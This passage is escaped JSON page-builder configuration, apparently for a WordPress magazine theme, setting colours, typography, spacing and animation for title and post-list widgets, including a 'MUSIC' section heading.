"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"\",\"category\":[\"10\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"600\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"on\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"on\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"1t9e6tv\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"MUSIC\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#ea7441\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"use_shadow\":\"use\",\"use_icon_post_list_1\":\"on\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"on\",\"post_view_color_post_list_1\":\"#ffffff\",\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight\":\"600\",\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"use_category_post_list_1\":\"on\",\"typhography_category_post_list_1_color\":\"#ffffff\",\"post_list1_category_title_hov_color\":\"#ffffff\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight\":\"600\",\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"use_title_post_list_1\":\"on\",\"typhography_title_post_list_1_color\":\"#000000\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_meta_post_list_1\":\"\",\"typhography_meta_text_post_list_1_color\":\"#999999\",\"typhography_meta_post_list_1_color\":\"#000000\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight\":\"600\",\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"typhography_excerpt_post_list_1_color\":\"#777777\",\"post_list_1_excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"typhography_read_more_post_list_1_color\":\"#000000\",\"post_list1_read_more_title_hov_color\":\"#111111\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight\":\"400\",\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"typhography_read_more_border_post_list_1_color\":\"#000000\",\"post_list1_read_more_border_hov_color\":\"#111111\",\"section_magzma_post_list_1_column_control\":\"\",\"post_list1_margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radi